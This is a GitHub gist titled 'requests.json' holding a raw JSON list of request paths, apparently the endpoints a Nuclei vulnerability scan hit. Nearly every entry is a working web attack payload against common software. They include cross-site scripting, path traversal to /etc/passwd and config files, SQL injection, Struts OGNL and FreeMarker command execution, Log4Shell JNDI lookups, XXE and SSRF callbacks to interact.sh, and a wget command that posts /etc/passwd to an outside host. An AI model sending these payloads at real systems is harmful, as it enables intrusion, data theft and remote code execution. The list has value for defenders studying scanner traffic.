Skip to content

Instantly share code, notes, and snippets.

@GuanacoDevs

GuanacoDevs/requests.json

Created June 28, 2022 15:09
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save GuanacoDevs/654be288519995bc09f2aca9921bf009 to your computer and use it in GitHub Desktop.
Save GuanacoDevs/654be288519995bc09f2aca9921bf009 to your computer and use it in GitHub Desktop.
Download ZIP
Endpoints used
Raw
requests.json
[
"/ui/vropspluginui/rest/services/getstatus",
"/ghost/preview",
"/wp-admin/admin.php/%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/?page=cnss_social_icon_page",
"/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq';%7D%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/log_download.cgi?type=../../etc/passwd",
"/templates/m/inc_head.php?q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00",
"/plugins/servlet/oauth/users/icon-uri?consumerUri=http://cadgqm02toabu64p21o0ckqa5eoyfhsgh.interact.sh",
"/include/downmix.inc.php",
"/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd",
"/actuator/gateway/routes/2A6ShqePdZpZ1dNu0uBhuYpknGL",
"/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00",
"/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd",
"/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/language/lang",
"/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&contactId=contactId'%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&",
"/assets/elFinder-2.1.9/elfinder.html",
"/2A6ShuByWPXRtqTVriIL2i8s3xT",
"/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=%5B33:system('wget%20http://example.com')%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json",
"/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs",
"/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/files.md5",
"/?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22",
"/clansphere/mods/clansphere/lang_modvalidate.php?language=language'%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&module=module",
"/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml",
"/wp-admin/admin.php?page=domain-check-profile&domain=test.foo%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/cs/ContentServer",
"/",
"/xmlpserver/convert?xml=%3C%3Fxml+version%3D%221.0%22+%3F%3E%3C!DOCTYPE+r+%5B%3C!ELEMENT+r+ANY+%3E%3C!ENTITY+%25+sp+SYSTEM+%22http%3A//cadgqm02toabu64p21o0ckx1g7ayemg3r.interact.sh/xxe.xml%22%3E%25sp%3B%25param1%3B%5D%3E&_xf=Excel&_xl=123&template=123",
"/wp-content/plugins/jh-404-logger/readme.txt",
"/solr/admin/cores?wt=json",
"/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd",
"/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?name=%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3D'cat%20/etc/passwd').(%23iswin%3D(%40java.lang.System%40getProperty('os.name').toLowerCase().contains('win'))).(%23cmds%3D(%23iswin%3F%7B'cmd.exe'%2C'/c'%2C%23cmd%7D%3A%7B'/bin/bash'%2C'-c'%2C%23cmd%7D)).(%23p%3Dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3D%23p.start()).(%40org.apache.commons.io.IOUtils%40toString(%23process.getInputStream()))%7D",
"/integration/saveGangster.action",
"/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%3Fnew()(%22cat%20%2Fetc%2Fhosts%22)%7D",
"/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&",
"/lua/.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2Ffind_prefs.lua.css",
"/IntellectMain.jsp?IntellectSystem=https://www.example.com",
"/wp-admin/admin-ajax.php?action=cace3497d458872ea7495749f83d7b1f",
"/_fragment?_path=_controller=phpcredits&flag=-1",
"/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E",
"/druid/indexer/v1/sampler",
"/mailingupgrade.php",
"/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Eyql8b=1",
"/?layout=/etc/passwd",
"/tag_test_action.php?url=a&token=&partcode=%7Bdede:field%20name='source'%20runphp='yes'%7Dphpinfo();%7B/dede:field%7D",
"/index.php?redirect=//evil.com",
"/Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(document.domain)%22%3E%3Cform%3E",
"/?q=%7B%7Buserid%7D%7D%2Fcancel",
"/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E",
"/cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C",
"/wp-login.php?wlcms-action=preview",
"/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00",
"/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00",
"/api/experimental/latest_runs",
"/admin/",
"/secureader/javax.faces.resource/web.xml?loc=../WEB-INF",
"/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd",
"/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd",
"/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/Admin",
"/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php",
"/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00",
"/cgi/networkDiag.cgi",
"/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php",
"/filemanager/upload.php",
"/wp-admin/options-general.php?page=yuzo-related-post",
"/theme/META-INF/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwd",
"/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../",
"/wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc",
"/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json",
"/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini",
"/+CSCOE+/saml/sp/acs?tgname=a",
"/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php/backend_api/ajax_get_calendar_events",
"/reports/rwservlet/showenv",
"/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22",
"/api/jolokia/read%3Csvg%20onload=alert(document.domain)%3E?mimeType=text/html",
"/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test",
"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd",
"/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+",
"/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/wp-admin/admin.php",
"/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%3C%22",
"/s/2A6ShwgIWT5ykzQjyonkb6LbI6d/_/;/WEB-INF/web.xml",
"/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat%20/etc/passwd').getInputStream()))",
"/rest/api/2/user/picker?query=",
"/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4",
"/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/2A6ShzJNEsB5lfQskwfzfC2RVMG/)%3C%2Fscript%3E",
"/druid/indexer/v1/sampler?for=connect",
"/index.php/example.com",
"/mantisbt-2.3.0/verify.php?id=1&confirm_hash=",
"/wp-json/buddypress/v1/signup",
"/card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60",
"/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00",
"/openam/oauth2/..;/ccversion/Version",
"/wp-admin/admin.php?page=rsvp-admin-export",
"/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa",
"/theme/META-INF/prototype%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AF..%C0%AFwindows/win.ini",
"/lib/dompdf/dompdf.php?input_file=dompdf.php",
"/index.action?action:$%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'sh','-c','id'%7D)).start(),%23b%3D%23a.getInputStream(),%23c%3Dnew%20java.io.InputStreamReader(%23b),%23d%3Dnew%20java.io.BufferedReader(%23c),%23e%3Dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
"/omni_success?cmdb_edit_path=%22);alert('nuclei');//",
"/api/getServices?name%5B%5D=$(wget%20--post-file%20/etc/passwd%20%7B%7Binteractsh-url%7D%7D)",
"/session/%7B%7Bsessionid%7D%7D/node/index",
"/ws_utc/resources/setting/options",
"/?x=$%7Bjndi:ldap://$%7BhostName%7D.uri.cadgqm02toabu64p21o0ckqjuseyni1fn.interact.sh/a%7D",
"/.%00./.%00./etc/passwd",
"/global-protect/login.esp?user=j%22;-alert(1)-%22x",
"/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bcat%20%2Fetc%2Fpasswd%20%23",
"/pme/media/",
"/api/snapshots/:key",
"/wp-content/plugins/insert-php/readme.txt",
"/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E",
"/plugins/servlet/svnwebclient/commitGraph.jsp?')%3Balert(%22XSS",
"/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00",
"/ads/www/delivery/lg.php?dest=http://example.com",
"/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk",
"/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00",
"/tests/support/stores/test_grid_filter.php?query=phpinfo();",
"/pages/createpage-entervariables.action?SpaceKey=x",
"/apisix/admin/migrate/export",
"/authenticationendpoint/%7B%7Bto_lower(%222A6Shsd2UVbt3M3Q9XHhMv59lUY%22)%7D%7D.jsp",
"/flightpath/index.php?q=system-handle-form-submit",
"/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd",
"/webmail/calendar/minimizer/index.php?style=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/etc%5Cpasswd",
"/wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd",
"/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image",
"/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd",
"/blast/nph-viewgif.cgi?../../../../etc/passwd",
"/autodiscover/autodiscover.json",
"/prweb/PRAuth/app/default/",
"/ajaxPages/writeBrowseFilePathAjax.php",
"/_snapshot/test2",
"/scripts/setup.php",
"/adminer?elastic=example.com&username=",
"/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true",
"/dashboardUser",
"/wp-admin/index.php",
"/tmui/locallb/workspace/fileSave.jsp",
"/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00",
"/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00",
"/zb_system/cmd.php?atc=login&redirect=http://www.example.com",
"/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00",
"/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00",
"/InsightPluginShowGeneralConfiguration.jspa;",
"/menu/stc",
"/lucee/admin/imgProcess.cfm?file=/whatever",
"/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00",
"/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B",
"/index.php?class=../../../../../../../etc/passwd%00",
"/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00",
"/menu/stapp",
"/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample",
"/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search",
"/2A6ShrtNQ3CY2h6jmVQN9akWRWy.php%5Cx0A",
"/assets/elFinder/elfinder.html",
"/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd",
"/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://cadgqm02toabu64p21o0ckxb88eygadt1.interact.sh%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://cadgqm02toabu64p21o0ckxb88eygadt1.interact.sh%7D;?%7B%7Brepeat(%22A%22,",
"/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true",
"/manage/webshell/u?s=5&w=218&h=15&k=%0A&l=62&_=5621298674064",
"/api/experimental/dags/example_trigger_target_dag/dag_runs",
"/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)",
"/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00",
"/CTCWebService/CTCWebServiceBean/ConfigServlet",
"/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00",
"/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/jolokia/read/getDiagnosticOptions",
"/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2Fultimatebingoverifier.appspot.com%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user')%3Balert(document.domain)%3B//&ses=test_user&t=1",
"/mgmt/tm/util/bash",
"/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/RestAPI/ImportTechnicians",
"/setup.php",
"/testrail/files.md5",
"/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00",
"/nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml",
"/cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots",
"/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/www.example.com",
"/getcfg.php",
"/system/deviceInfo?auth=YWRtaW46MTEK",
"/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd",
"/dumpmdm.cmd",
"/wsman",
"/admin/elfinder/elfinder-cke.html",
"/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=%3Cgroup_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/share/page/dologin",
"/_search?pretty",
"/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user%5Bemail%5D=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym",
"/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00",
"/login.action?action:$%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'sh','-c','id'%7D)).start(),%23b%3D%23a.getInputStream(),%23c%3Dnew%20java.io.InputStreamReader(%23b),%23d%3Dnew%20java.io.BufferedReader(%23c),%23e%3Dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
"/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin",
"/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00",
"/auth/requestreset",
"/system/console?.css",
"/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00",
"/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('cat%20/etc/passwd')%2B'",
"/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-",
"/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00",
"/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert(document.domain)%3C%2FsCripT%3E",
"/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine",
"/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt",
"/debug/pprof/goroutine?debug=1",
"/?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert(document.domain)%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng",
"/index.php?page=&action=edit&f1=.//./%5C.//./%5C.//./%5C.//./%5C.//./%5C.//./etc/passwd&restore=1",
"/mifs/.;/services/LogService",
"/wp-admin/",
"/search/members/?id%60%3D520)%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex('70726f6a656374646973636f766572792e696f')%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1",
"/webadmin/out",
"/wp-admin/admin.php?page=fv_player_stats&player_id=1%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF",
"/menu/ss?sid=nsroot&username=nsroot&force_setup=1",
"/wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx)",
"/dokuwiki/doku.php?id=wiki:welcome&at=%3Csvg%20onload=alert(document.domain)%3E",
"/about_state",
"/uploads/employees_ids/%7B%7Bendpoint%7D%7D?cmd=cat%20/etc/passwd",
"/storfs-asup",
"/comm.php?id=../../../../../../../../../../etc/passwd",
"/backend/admin/common/clearcache?previousUrl=http://www.example.com",
"/pages/createpage.action?spaceKey=myproj",
"/does_not_exist%22%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cimg%20src=x",
"/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd",
"/v1/2A6ShuWmQx8uPyLas0WP65eEzCb.php",
"/cgi-bin/config.exp",
"/labkey/__r1/login-login.view?returnUrl=http://example.com",
"/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(document.domain)')()%7D%7D?orgId=1",
"/%5Cgoogle.com/evil.html",
"/carbon/admin/login.jsp?msgId='%3Balert('nuclei')%2F%2F",
"/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_canteen&controller=../../../../../etc/passwd%00",
"/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd",
"/help/admin-guide/test.jsp",
"/console/images/%252e%252e%252fconsole.portal",
"/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com%3CSvg%2Fonload%3Dalert(document.domain)%3E",
"/horde/admin/user.php",
"/wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login=%7B%7Busername%7D%7D",
"/t/index.php?action%5B%5D=aaaa",
"/api/v4/ci/lint?include_merged_yaml=true",
"/index.action?redirectAction:$%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'sh','-c','id'%7D)).start(),%23b%3D%23a.getInputStream(),%23c%3Dnew%20java.io.InputStreamReader(%23b),%23d%3Dnew%20java.io.BufferedReader(%23c),%23e%3Dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2BCSCOE%2B/portal_inc.lua",
"/image/image%3A%2F%2F..%252fetc%252fpasswd",
"/zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://cadgqm02toabu64p21o0ckojtbeym45ty.interact.sh%23",
"/users/user-dark-features",
"/cgi-bin/file_transfer.cgi",
"/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename'%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&",
"/wp-content/plugins/canto/includes/lib/tree.php?subdomain=cadgqm02toabu64p21o0ckp95fyybtibw.interact.sh",
"/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ew5px3=1",
"/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00",
"/wp-admin/admin.php?page=cf7skins&tab='%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E",
"/debug.cgi",
"/backup2.cgi",
"/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00",
"/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00",
"/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E",
"/service/extdirect",
"/api/settings/values",
"/api/2A6Si1iuZkUvcvEZnW40RolsmKU",
"/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php/catalogsearch/advanced/result/?name=e",
"/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd",
